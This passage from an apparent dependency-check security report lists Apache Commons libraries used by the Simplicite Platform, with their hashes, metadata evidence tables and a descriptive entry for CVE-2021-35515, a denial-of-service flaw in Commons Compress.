SHA256: fd3c7c9545a9cdb2051d1f9155c4f76b1e4ac5a57304404a6eedb578ffba7328
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | commons-cli | High |
| Vendor | jar | package name | apache | Highest |
| Vendor | jar | package name | cli | Highest |
| Vendor | jar | package name | commons | Highest |
| Vendor | Manifest | bundle-docurl | http://commons.apache.org/proper/commons-cli/ | Low |
| Vendor | Manifest | bundle-symbolicname | org.apache.commons.cli | Medium |
| Vendor | Manifest | implementation-build | tags/cli-1.4-RC1@r1786159; 2017-03-09 13:01:35+0000 | Low |
| Vendor | Manifest | implementation-url | http://commons.apache.org/proper/commons-cli/ | Low |
| Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High |
| Vendor | Manifest | Implementation-Vendor-Id | org.apache | Medium |
| Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" | Low |
| Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low |
| Vendor | pom | artifactid | commons-cli | Highest |
| Vendor | pom | artifactid | commons-cli | Low |
| Vendor | pom | developer email | bob@werken.com | Low |
| Vendor | pom | developer email | ebourg@apache.org | Low |
| Vendor | pom | developer email | jbjk@mac.com | Low |
| Vendor | pom | developer email | jstrachan@apache.org | Low |
| Vendor | pom | developer email | roxspring@imapmail.org | Low |
| Vendor | pom | developer email | tn@apache.org | Low |
| Vendor | pom | developer id | bob | Medium |
| Vendor | pom | developer id | ebourg | Medium |
| Vendor | pom | developer id | jkeyes | Medium |
| Vendor | pom | developer id | jstrachan | Medium |
| Vendor | pom | developer id | roxspring | Medium |
| Vendor | pom | developer id | tn | Medium |
| Vendor | pom | developer name | Bob McWhirter | Medium |
| Vendor | pom | developer name | Emmanuel Bourg | Medium |
| Vendor | pom | developer name | James Strachan | Medium |
| Vendor | pom | developer name | John Keyes | Medium |
| Vendor | pom | developer name | Rob Oxspring | Medium |
| Vendor | pom | developer name | Thomas Neidhart | Medium |
| Vendor | pom | developer org | Ariane Software | Medium |
| Vendor | pom | developer org | Indigo Stone | Medium |
| Vendor | pom | developer org | integral Source | Medium |
| Vendor | pom | developer org | SpiritSoft, Inc. | Medium |
| Vendor | pom | developer org | Werken | Medium |
| Vendor | pom | groupid | commons-cli | Highest |
| Vendor | pom | name | Apache Commons CLI | High |
| Vendor | pom | parent-artifactid | commons-parent | Low |
| Vendor | pom | parent-groupid | org.apache.commons | Medium |
| Vendor | pom | url | http://commons.apache.org/proper/commons-cli/ | Highest |
| Product | file | name | commons-cli | High |
| Product | jar | package name | apache | Highest |
| Product | jar | package name | cli | Highest |
| Product | jar | package name | commons | Highest |
| Product | Manifest | bundle-docurl | http://commons.apache.org/proper/commons-cli/ | Low |
| Product | Manifest | Bundle-Name | Apache Commons CLI | Medium |
| Product | Manifest | bundle-symbolicname | org.apache.commons.cli | Medium |
| Product | Manifest | implementation-build | tags/cli-1.4-RC1@r1786159; 2017-03-09 13:01:35+0000 | Low |
| Product | Manifest | Implementation-Title | Apache Commons CLI | High |
| Product | Manifest | implementation-url | http://commons.apache.org/proper/commons-cli/ | Low |
| Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" | Low |
| Product | Manifest | specification-title | Apache Commons CLI | Medium |
| Product | pom | artifactid | commons-cli | Highest |
| Product | pom | developer email | bob@werken.com | Low |
| Product | pom | developer email | ebourg@apache.org | Low |
| Product | pom | developer email | jbjk@mac.com | Low |
| Product | pom | developer email | jstrachan@apache.org | Low |
| Product | pom | developer email | roxspring@imapmail.org | Low |
| Product | pom | developer email | tn@apache.org | Low |
| Product | pom | developer id | bob | Low |
| Product | pom | developer id | ebourg | Low |
| Product | pom | developer id | jkeyes | Low |
| Product | pom | developer id | jstrachan | Low |
| Product | pom | developer id | roxspring | Low |
| Product | pom | developer id | tn | Low |
| Product | pom | developer name | Bob McWhirter | Low |
| Product | pom | developer name | Emmanuel Bourg | Low |
| Product | pom | developer name | James Strachan | Low |
| Product | pom | developer name | John Keyes | Low |
| Product | pom | developer name | Rob Oxspring | Low |
| Product | pom | developer name | Thomas Neidhart | Low |
| Product | pom | developer org | Ariane Software | Low |
| Product | pom | developer org | Indigo Stone | Low |
| Product | pom | developer org | integral Source | Low |
| Product | pom | developer org | SpiritSoft, Inc. | Low |
| Product | pom | developer org | Werken | Low |
| Product | pom | groupid | commons-cli | Highest |
| Product | pom | name | Apache Commons CLI | High |
| Product | pom | parent-artifactid | commons-parent | Medium |
| Product | pom | parent-groupid | org.apache.commons | Medium |
| Product | pom | url | http://commons.apache.org/proper/commons-cli/ | Medium |
| Version | file | version | 1.4 | High |
| Version | Manifest | Implementation-Version | 1.4 | High |
| Version | pom | parent-version | 1.4 | Low |
| Version | pom | version | 1.4 | Highest |
commons-codec-1.13.jar
Description: The Apache Commons Codec package contains simple encoder and decoders for various formats such as Base64 and Hexadecimal. In addition to these widely used encoders and decoders, the codec package also maintains a collection of phonetic encoding utilities.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-codec/commons-codec/1.13/commons-codec-1.13.jar
MD5: 5085f186156822fa3a02e55bcd5584a8
SHA1: 3f18e1aa31031d89db6f01ba05d501258ce69d2c
SHA256: 61f7a3079e92b9fdd605238d0295af5fd11ac411a0a0af48deace1f6c5ffa072
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | commons-codec | High |
| Vendor | jar | package name | apache | Highest |
| Vendor | jar | package name | codec | Highest |
| Vendor | jar | package name | commons | Highest |
| Vendor | jar | package name | encoder | Highest |
| Vendor | Manifest | automatic-module-name | org.apache.commons.codec | Medium |
| Vendor | Manifest | bundle-docurl | https://commons.apache.org/proper/commons-codec/ | Low |
| Vendor | Manifest | bundle-symbolicname | org.apache.commons.commons-codec | Medium |
| Vendor | Manifest | implementation-url | https://commons.apache.org/proper/commons-codec/ | Low |
| Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High |
| Vendor | Manifest | Implementation-Vendor-Id | commons-codec | Medium |
| Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low |
| Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low |
| Vendor | pom | artifactid | commons-codec | Highest |
| Vendor | pom | artifactid | commons-codec | Low |
| Vendor | pom | developer email | bayard@apache.org | Low |
| Vendor | pom | developer email | chtompki@apache.org | Low |
| Vendor | pom | developer email | dgraham@apache.org | Low |
| Vendor | pom | developer email | dlr@finemaltcoding.com | Low |
| Vendor | pom | developer email | ggregory@apache.org | Low |
| Vendor | pom | developer email | jon@collab.net | Low |
| Vendor | pom | developer email | julius@apache.org | Low |
| Vendor | pom | developer email | rwaldhoff@apache.org | Low |
| Vendor | pom | developer email | sanders@totalsync.com | Low |
| Vendor | pom | developer email | tn@apache.org | Low |
| Vendor | pom | developer email | tobrien@apache.org | Low |
| Vendor | pom | developer id | bayard | Medium |
| Vendor | pom | developer id | chtompki | Medium |
| Vendor | pom | developer id | dgraham | Medium |
| Vendor | pom | developer id | dlr | Medium |
| Vendor | pom | developer id | ggregory | Medium |
| Vendor | pom | developer id | jon | Medium |
| Vendor | pom | developer id | julius | Medium |
| Vendor | pom | developer id | rwaldhoff | Medium |
| Vendor | pom | developer id | sanders | Medium |
| Vendor | pom | developer id | tn | Medium |
| Vendor | pom | developer id | tobrien | Medium |
| Vendor | pom | developer name | Daniel Rall | Medium |
| Vendor | pom | developer name | David Graham | Medium |
| Vendor | pom | developer name | Gary Gregory | Medium |
| Vendor | pom | developer name | Henri Yandell | Medium |
| Vendor | pom | developer name | Jon S. Stevens | Medium |
| Vendor | pom | developer name | Julius Davies | Medium |
| Vendor | pom | developer name | Rob Tompkins | Medium |
| Vendor | pom | developer name | Rodney Waldhoff | Medium |
| Vendor | pom | developer name | Scott Sanders | Medium |
| Vendor | pom | developer name | Thomas Neidhart | Medium |
| Vendor | pom | developer name | Tim OBrien | Medium |
| Vendor | pom | developer org URL | http://juliusdavies.ca/ | Medium |
| Vendor | pom | groupid | commons-codec | Highest |
| Vendor | pom | name | Apache Commons Codec | High |
| Vendor | pom | parent-artifactid | commons-parent | Low |
| Vendor | pom | parent-groupid | org.apache.commons | Medium |
| Vendor | pom | url | https://commons.apache.org/proper/commons-codec/ | Highest |
| Product | file | name | commons-codec | High |
| Product | jar | package name | apache | Highest |
| Product | jar | package name | codec | Highest |
| Product | jar | package name | commons | Highest |
| Product | jar | package name | encoder | Highest |
| Product | Manifest | automatic-module-name | org.apache.commons.codec | Medium |
| Product | Manifest | bundle-docurl | https://commons.apache.org/proper/commons-codec/ | Low |
| Product | Manifest | Bundle-Name | Apache Commons Codec | Medium |
| Product | Manifest | bundle-symbolicname | org.apache.commons.commons-codec | Medium |
| Product | Manifest | Implementation-Title | Apache Commons Codec | High |
| Product | Manifest | implementation-url | https://commons.apache.org/proper/commons-codec/ | Low |
| Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low |
| Product | Manifest | specification-title | Apache Commons Codec | Medium |
| Product | pom | artifactid | commons-codec | Highest |
| Product | pom | developer email | bayard@apache.org | Low |
| Product | pom | developer email | chtompki@apache.org | Low |
| Product | pom | developer email | dgraham@apache.org | Low |
| Product | pom | developer email | dlr@finemaltcoding.com | Low |
| Product | pom | developer email | ggregory@apache.org | Low |
| Product | pom | developer email | jon@collab.net | Low |
| Product | pom | developer email | julius@apache.org | Low |
| Product | pom | developer email | rwaldhoff@apache.org | Low |
| Product | pom | developer email | sanders@totalsync.com | Low |
| Product | pom | developer email | tn@apache.org | Low |
| Product | pom | developer email | tobrien@apache.org | Low |
| Product | pom | developer id | bayard | Low |
| Product | pom | developer id | chtompki | Low |
| Product | pom | developer id | dgraham | Low |
| Product | pom | developer id | dlr | Low |
| Product | pom | developer id | ggregory | Low |
| Product | pom | developer id | jon | Low |
| Product | pom | developer id | julius | Low |
| Product | pom | developer id | rwaldhoff | Low |
| Product | pom | developer id | sanders | Low |
| Product | pom | developer id | tn | Low |
| Product | pom | developer id | tobrien | Low |
| Product | pom | developer name | Daniel Rall | Low |
| Product | pom | developer name | David Graham | Low |
| Product | pom | developer name | Gary Gregory | Low |
| Product | pom | developer name | Henri Yandell | Low |
| Product | pom | developer name | Jon S. Stevens | Low |
| Product | pom | developer name | Julius Davies | Low |
| Product | pom | developer name | Rob Tompkins | Low |
| Product | pom | developer name | Rodney Waldhoff | Low |
| Product | pom | developer name | Scott Sanders | Low |
| Product | pom | developer name | Thomas Neidhart | Low |
| Product | pom | developer name | Tim OBrien | Low |
| Product | pom | developer org URL | http://juliusdavies.ca/ | Low |
| Product | pom | groupid | commons-codec | Highest |
| Product | pom | name | Apache Commons Codec | High |
| Product | pom | parent-artifactid | commons-parent | Medium |
| Product | pom | parent-groupid | org.apache.commons | Medium |
| Product | pom | url | https://commons.apache.org/proper/commons-codec/ | Medium |
| Version | file | version | 1.13 | High |
| Version | Manifest | Implementation-Version | 1.13 | High |
| Version | pom | parent-version | 1.13 | Low |
| Version | pom | version | 1.13 | Highest |
commons-collections-3.2.2.jar
Description: Types that extend and augment the Java Collections Framework.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.jar
MD5: f54a8510f834a1a57166970bfc982e94
SHA1: 8ad72fe39fa8c91eaaf12aadb21e0c3661fe26d5
SHA256: eeeae917917144a68a741d4c0dff66aa5c5c5fd85593ff217bced3fc8ca783b8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | commons-collections | High |
| Vendor | jar | package name | apache | Highest |
| Vendor | jar | package name | collections | Highest |
| Vendor | jar | package name | commons | Highest |
| Vendor | Manifest | bundle-docurl | http://commons.apache.org/collections/ | Low |
| Vendor | Manifest | bundle-symbolicname | org.apache.commons.collections | Medium |
| Vendor | Manifest | implementation-build | tags/COLLECTIONS_3_2_2_RC3@r1714131; 2015-11-13 00:09:45+0100 | Low |
| Vendor | Manifest | implementation-url | http://commons.apache.org/collections/ | Low |
| Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High |
| Vendor | Manifest | Implementation-Vendor-Id | org.apache | Medium |
| Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.3))" | Low |
| Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low |
| Vendor | pom | artifactid | commons-collections | Highest |
| Vendor | pom | artifactid | commons-collections | Low |
| Vendor | pom | developer id | amamment | Medium |
| Vendor | pom | developer id | bayard | Medium |
| Vendor | pom | developer id | craigmcc | Medium |
| Vendor | pom | developer id | geirm | Medium |
| Vendor | pom | developer id | jcarman | Medium |
| Vendor | pom | developer id | matth | Medium |
| Vendor | pom | developer id | morgand | Medium |
| Vendor | pom | developer id | psteitz | Medium |
| Vendor | pom | developer id | rdonkin | Medium |
| Vendor | pom | developer id | rwaldhoff | Medium |
| Vendor | pom | developer id | scolebourne | Medium |
| Vendor | pom | developer name | Arun M. Thomas | Medium |
| Vendor | pom | developer name | Craig McClanahan | Medium |
| Vendor | pom | developer name | Geir Magnusson | Medium |
| Vendor | pom | developer name | Henri Yandell | Medium |
| Vendor | pom | developer name | James Carman | Medium |
| Vendor | pom | developer name | Matthew Hawthorne | Medium |
| Vendor | pom | developer name | Morgan Delagrange | Medium |
| Vendor | pom | developer name | Phil Steitz | Medium |
| Vendor | pom | developer name | Robert Burrell Donkin | Medium |
| Vendor | pom | developer name | Rodney Waldhoff | Medium |
| Vendor | pom | developer name | Stephen Colebourne | Medium |
| Vendor | pom | groupid | commons-collections | Highest |
| Vendor | pom | name | Apache Commons Collections | High |
| Vendor | pom | parent-artifactid | commons-parent | Low |
| Vendor | pom | parent-groupid | org.apache.commons | Medium |
| Vendor | pom | url | http://commons.apache.org/collections/ | Highest |
| Product | file | name | commons-collections | High |
| Product | jar | package name | apache | Highest |
| Product | jar | package name | collections | Highest |
| Product | jar | package name | commons | Highest |
| Product | Manifest | bundle-docurl | http://commons.apache.org/collections/ | Low |
| Product | Manifest | Bundle-Name | Apache Commons Collections | Medium |
| Product | Manifest | bundle-symbolicname | org.apache.commons.collections | Medium |
| Product | Manifest | implementation-build | tags/COLLECTIONS_3_2_2_RC3@r1714131; 2015-11-13 00:09:45+0100 | Low |
| Product | Manifest | Implementation-Title | Apache Commons Collections | High |
| Product | Manifest | implementation-url | http://commons.apache.org/collections/ | Low |
| Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.3))" | Low |
| Product | Manifest | specification-title | Apache Commons Collections | Medium |
| Product | pom | artifactid | commons-collections | Highest |
| Product | pom | developer id | amamment | Low |
| Product | pom | developer id | bayard | Low |
| Product | pom | developer id | craigmcc | Low |
| Product | pom | developer id | geirm | Low |
| Product | pom | developer id | jcarman | Low |
| Product | pom | developer id | matth | Low |
| Product | pom | developer id | morgand | Low |
| Product | pom | developer id | psteitz | Low |
| Product | pom | developer id | rdonkin | Low |
| Product | pom | developer id | rwaldhoff | Low |
| Product | pom | developer id | scolebourne | Low |
| Product | pom | developer name | Arun M. Thomas | Low |
| Product | pom | developer name | Craig McClanahan | Low |
| Product | pom | developer name | Geir Magnusson | Low |
| Product | pom | developer name | Henri Yandell | Low |
| Product | pom | developer name | James Carman | Low |
| Product | pom | developer name | Matthew Hawthorne | Low |
| Product | pom | developer name | Morgan Delagrange | Low |
| Product | pom | developer name | Phil Steitz | Low |
| Product | pom | developer name | Robert Burrell Donkin | Low |
| Product | pom | developer name | Rodney Waldhoff | Low |
| Product | pom | developer name | Stephen Colebourne | Low |
| Product | pom | groupid | commons-collections | Highest |
| Product | pom | name | Apache Commons Collections | High |
| Product | pom | parent-artifactid | commons-parent | Medium |
| Product | pom | parent-groupid | org.apache.commons | Medium |
| Product | pom | url | http://commons.apache.org/collections/ | Medium |
| Version | file | version | 3.2.2 | High |
| Version | Manifest | Bundle-Version | 3.2.2 | High |
| Version | Manifest | Implementation-Version | 3.2.2 | High |
| Version | pom | parent-version | 3.2.2 | Low |
| Version | pom | version | 3.2.2 | Highest |
commons-collections4-4.4.jar
Description: The Apache Commons Collections package contains types that extend and augment the Java Collections Framework.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-collections4/4.4/commons-collections4-4.4.jar
MD5: 4a37023740719b391f10030362c86be6
SHA1: 62ebe7544cb7164d87e0637a2a6a2bdc981395e8
SHA256: 1df8b9430b5c8ed143d7815e403e33ef5371b2400aadbe9bda0883762e0846d1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | commons-collections4 | High |
| Vendor | jar | package name | apache | Highest |
| Vendor | jar | package name | collections4 | Highest |
| Vendor | jar | package name | commons | Highest |
| Vendor | Manifest | automatic-module-name | org.apache.commons.collections4 | Medium |
| Vendor | Manifest | bundle-docurl | https://commons.apache.org/proper/commons-collections/ | Low |
| Vendor | Manifest | bundle-symbolicname | org.apache.commons.commons-collections4 | Medium |
| Vendor | Manifest | implementation-url | https://commons.apache.org/proper/commons-collections/ | Low |
| Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High |
| Vendor | Manifest | Implementation-Vendor-Id | org.apache.commons | Medium |
| Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" | Low |
| Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low |
| Vendor | pom | artifactid | commons-collections4 | Highest |
| Vendor | pom | artifactid | commons-collections4 | Low |
| Vendor | pom | developer id | adriannistor | Medium |
| Vendor | pom | developer id | amamment | Medium |
| Vendor | pom | developer id | bayard | Medium |
| Vendor | pom | developer id | chtompki | Medium |
| Vendor | pom | developer id | craigmcc | Medium |
| Vendor | pom | developer id | dlaha | Medium |
| Vendor | pom | developer id | geirm | Medium |
| Vendor | pom | developer id | ggregory | Medium |
| Vendor | pom | developer id | jcarman | Medium |
| Vendor | pom | developer id | luc | Medium |
| Vendor | pom | developer id | matth | Medium |
| Vendor | pom | developer id | mbenson | Medium |
| Vendor | pom | developer id | morgand | Medium |
| Vendor | pom | developer id | rdonkin | Medium |
| Vendor | pom | developer id | rwaldhoff | Medium |
| Vendor | pom | developer id | scolebourne | Medium |
| Vendor | pom | developer id | tn | Medium |
| Vendor | pom | developer name | Adrian Nistor | Medium |
| Vendor | pom | developer name | Arun M. Thomas | Medium |
| Vendor | pom | developer name | Craig McClanahan | Medium |
| Vendor | pom | developer name | Dipanjan Laha | Medium |
| Vendor | pom | developer name | Gary Gregory | Medium |
| Vendor | pom | developer name | Geir Magnusson | Medium |
| Vendor | pom | developer name | Henri Yandell | Medium |
| Vendor | pom | developer name | James Carman | Medium |
| Vendor | pom | developer name | Luc Maisonobe | Medium |
| Vendor | pom | developer name | Matt Benson | Medium |
| Vendor | pom | developer name | Matthew Hawthorne | Medium |
| Vendor | pom | developer name | Morgan Delagrange | Medium |
| Vendor | pom | developer name | Rob Tompkins | Medium |
| Vendor | pom | developer name | Robert Burrell Donkin | Medium |
| Vendor | pom | developer name | Rodney Waldhoff | Medium |
| Vendor | pom | developer name | Stephen Colebourne | Medium |
| Vendor | pom | developer name | Thomas Neidhart | Medium |
| Vendor | pom | groupid | org.apache.commons | Highest |
| Vendor | pom | name | Apache Commons Collections | High |
| Vendor | pom | parent-artifactid | commons-parent | Low |
| Vendor | pom | url | https://commons.apache.org/proper/commons-collections/ | Highest |
| Product | file | name | commons-collections4 | High |
| Product | jar | package name | apache | Highest |
| Product | jar | package name | collections4 | Highest |
| Product | jar | package name | commons | Highest |
| Product | Manifest | automatic-module-name | org.apache.commons.collections4 | Medium |
| Product | Manifest | bundle-docurl | https://commons.apache.org/proper/commons-collections/ | Low |
| Product | Manifest | Bundle-Name | Apache Commons Collections | Medium |
| Product | Manifest | bundle-symbolicname | org.apache.commons.commons-collections4 | Medium |
| Product | Manifest | Implementation-Title | Apache Commons Collections | High |
| Product | Manifest | implementation-url | https://commons.apache.org/proper/commons-collections/ | Low |
| Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" | Low |
| Product | Manifest | specification-title | Apache Commons Collections | Medium |
| Product | pom | artifactid | commons-collections4 | Highest |
| Product | pom | developer id | adriannistor | Low |
| Product | pom | developer id | amamment | Low |
| Product | pom | developer id | bayard | Low |
| Product | pom | developer id | chtompki | Low |
| Product | pom | developer id | craigmcc | Low |
| Product | pom | developer id | dlaha | Low |
| Product | pom | developer id | geirm | Low |
| Product | pom | developer id | ggregory | Low |
| Product | pom | developer id | jcarman | Low |
| Product | pom | developer id | luc | Low |
| Product | pom | developer id | matth | Low |
| Product | pom | developer id | mbenson | Low |
| Product | pom | developer id | morgand | Low |
| Product | pom | developer id | rdonkin | Low |
| Product | pom | developer id | rwaldhoff | Low |
| Product | pom | developer id | scolebourne | Low |
| Product | pom | developer id | tn | Low |
| Product | pom | developer name | Adrian Nistor | Low |
| Product | pom | developer name | Arun M. Thomas | Low |
| Product | pom | developer name | Craig McClanahan | Low |
| Product | pom | developer name | Dipanjan Laha | Low |
| Product | pom | developer name | Gary Gregory | Low |
| Product | pom | developer name | Geir Magnusson | Low |
| Product | pom | developer name | Henri Yandell | Low |
| Product | pom | developer name | James Carman | Low |
| Product | pom | developer name | Luc Maisonobe | Low |
| Product | pom | developer name | Matt Benson | Low |
| Product | pom | developer name | Matthew Hawthorne | Low |
| Product | pom | developer name | Morgan Delagrange | Low |
| Product | pom | developer name | Rob Tompkins | Low |
| Product | pom | developer name | Robert Burrell Donkin | Low |
| Product | pom | developer name | Rodney Waldhoff | Low |
| Product | pom | developer name | Stephen Colebourne | Low |
| Product | pom | developer name | Thomas Neidhart | Low |
| Product | pom | groupid | org.apache.commons | Highest |
| Product | pom | name | Apache Commons Collections | High |
| Product | pom | parent-artifactid | commons-parent | Medium |
| Product | pom | url | https://commons.apache.org/proper/commons-collections/ | Medium |
| Version | file | version | 4.4 | High |
| Version | Manifest | Implementation-Version | 4.4 | High |
| Version | pom | parent-version | 4.4 | Low |
| Version | pom | version | 4.4 | Highest |
commons-compress-1.19.jar
Description: Apache Commons Compress software defines an API for working with compression and archive formats. These include: bzip2, gzip, pack200, lzma, xz, Snappy, traditional Unix Compress, DEFLATE, DEFLATE64, LZ4, Brotli, Zstandard and ar, cpio, jar, tar, zip, dump, 7z, arj.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-compress/1.19/commons-compress-1.19.jar
MD5: fe897bced43468450b785b66c1cff455
SHA1: 7e65777fb451ddab6a9c054beb879e521b7eab78
SHA256: ff2d59fad74e867630fbc7daab14c432654712ac624dbee468d220677b124dd5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | commons-compress | High |
| Vendor | jar | package name | apache | Highest |
| Vendor | jar | package name | commons | Highest |
| Vendor | jar | package name | compress | Highest |
| Vendor | Manifest | automatic-module-name | org.apache.commons.compress | Medium |
| Vendor | Manifest | bundle-docurl | https://commons.apache.org/proper/commons-compress/ | Low |
| Vendor | Manifest | bundle-symbolicname | org.apache.commons.commons-compress | Medium |
| Vendor | Manifest | extension-name | org.apache.commons.compress | Medium |
| Vendor | Manifest | implementation-build | UNKNOWN@r516f76ac1fe48be9a5162e53e4d0a99f23774565; 2019-08-24 16:14:33+0000 | Low |
| Vendor | Manifest | implementation-url | https://commons.apache.org/proper/commons-compress/ | Low |
| Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High |
| Vendor | Manifest | Implementation-Vendor-Id | org.apache | Medium |
| Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low |
| Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low |
| Vendor | pom | artifactid | commons-compress | Highest |
| Vendor | pom | artifactid | commons-compress | Low |
| Vendor | pom | developer email | bodewig at apache.org | Low |
| Vendor | pom | developer email | chtompki at apache.org | Low |
| Vendor | pom | developer email | damjan at apache.org | Low |
| Vendor | pom | developer email | ebourg at apache.org | Low |
| Vendor | pom | developer email | ggregory at apache.org | Low |
| Vendor | pom | developer email | grobmeier at apache.org | Low |
| Vendor | pom | developer email | julius at apache.org | Low |
| Vendor | pom | developer email | sebb at apache.org | Low |
| Vendor | pom | developer email | tcurdt at apache.org | Low |
| Vendor | pom | developer id | bodewig | Medium |
| Vendor | pom | developer id | chtompki | Medium |
| Vendor | pom | developer id | damjan | Medium |
| Vendor | pom | developer id | ebourg | Medium |
| Vendor | pom | developer id | ggregory | Medium |
| Vendor | pom | developer id | grobmeier | Medium |
| Vendor | pom | developer id | julius | Medium |
| Vendor | pom | developer id | sebb | Medium |
| Vendor | pom | developer id | tcurdt | Medium |
| Vendor | pom | developer name | Christian Grobmeier | Medium |
| Vendor | pom | developer name | Damjan Jovanovic | Medium |
| Vendor | pom | developer name | Emmanuel Bourg | Medium |
| Vendor | pom | developer name | Gary Gregory | Medium |
| Vendor | pom | developer name | Julius Davies | Medium |
| Vendor | pom | developer name | Rob Tompkins | Medium |
| Vendor | pom | developer name | Sebastian Bazley | Medium |
| Vendor | pom | developer name | Stefan Bodewig | Medium |
| Vendor | pom | developer name | Torsten Curdt | Medium |
| Vendor | pom | groupid | org.apache.commons | Highest |
| Vendor | pom | name | Apache Commons Compress | High |
| Vendor | pom | parent-artifactid | commons-parent | Low |
| Vendor | pom | url | https://commons.apache.org/proper/commons-compress/ | Highest |
| Product | file | name | commons-compress | High |
| Product | jar | package name | apache | Highest |
| Product | jar | package name | commons | Highest |
| Product | jar | package name | compress | Highest |
| Product | Manifest | automatic-module-name | org.apache.commons.compress | Medium |
| Product | Manifest | bundle-docurl | https://commons.apache.org/proper/commons-compress/ | Low |
| Product | Manifest | Bundle-Name | Apache Commons Compress | Medium |
| Product | Manifest | bundle-symbolicname | org.apache.commons.commons-compress | Medium |
| Product | Manifest | extension-name | org.apache.commons.compress | Medium |
| Product | Manifest | implementation-build | UNKNOWN@r516f76ac1fe48be9a5162e53e4d0a99f23774565; 2019-08-24 16:14:33+0000 | Low |
| Product | Manifest | Implementation-Title | Apache Commons Compress | High |
| Product | Manifest | implementation-url | https://commons.apache.org/proper/commons-compress/ | Low |
| Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low |
| Product | Manifest | specification-title | Apache Commons Compress | Medium |
| Product | pom | artifactid | commons-compress | Highest |
| Product | pom | developer email | bodewig at apache.org | Low |
| Product | pom | developer email | chtompki at apache.org | Low |
| Product | pom | developer email | damjan at apache.org | Low |
| Product | pom | developer email | ebourg at apache.org | Low |
| Product | pom | developer email | ggregory at apache.org | Low |
| Product | pom | developer email | grobmeier at apache.org | Low |
| Product | pom | developer email | julius at apache.org | Low |
| Product | pom | developer email | sebb at apache.org | Low |
| Product | pom | developer email | tcurdt at apache.org | Low |
| Product | pom | developer id | bodewig | Low |
| Product | pom | developer id | chtompki | Low |
| Product | pom | developer id | damjan | Low |
| Product | pom | developer id | ebourg | Low |
| Product | pom | developer id | ggregory | Low |
| Product | pom | developer id | grobmeier | Low |
| Product | pom | developer id | julius | Low |
| Product | pom | developer id | sebb | Low |
| Product | pom | developer id | tcurdt | Low |
| Product | pom | developer name | Christian Grobmeier | Low |
| Product | pom | developer name | Damjan Jovanovic | Low |
| Product | pom | developer name | Emmanuel Bourg | Low |
| Product | pom | developer name | Gary Gregory | Low |
| Product | pom | developer name | Julius Davies | Low |
| Product | pom | developer name | Rob Tompkins | Low |
| Product | pom | developer name | Sebastian Bazley | Low |
| Product | pom | developer name | Stefan Bodewig | Low |
| Product | pom | developer name | Torsten Curdt | Low |
| Product | pom | groupid | org.apache.commons | Highest |
| Product | pom | name | Apache Commons Compress | High |
| Product | pom | parent-artifactid | commons-parent | Medium |
| Product | pom | url | https://commons.apache.org/proper/commons-compress/ | Medium |
| Version | file | version | 1.19 | High |
| Version | Manifest | Implementation-Version | 1.19 | High |
| Version | pom | parent-version | 1.19 | Low |
| Version | pom | version | 1.19 | Highest |
CVE-2021-35515
When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. This could be used to mount a denial of service attack against services that use Compress' sevenz package.
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
- [announce] 20210713 CVE-2021-35515: Apache Commons Compress 1.6 to 1.20 denial of service vulnerability
- [druid-commits] 20210726 [GitHub] [druid] suneet-s merged pull request #11496: Address CVE-2021-35515 CVE-2021-36090
- [druid-commits] 20210726 [GitHub] [druid] suneet-s opened a new pull request #11496: Address CVE-2021-35515 CVE-2021-36090
- [druid-commits] 20210726 [druid] branch master updated: Address CVE-2021-35515 CVE-2021-36090 (#11496)
- [poi-dev] 20210923 Re: [VOTE] Apache POI 5.1.0 release (RC1)
- [pulsar-commits] 20210716 [GitHub] [pulsar] lhotari opened a new pull request #11345: [Security] Upgrade commons-compress to 1.21
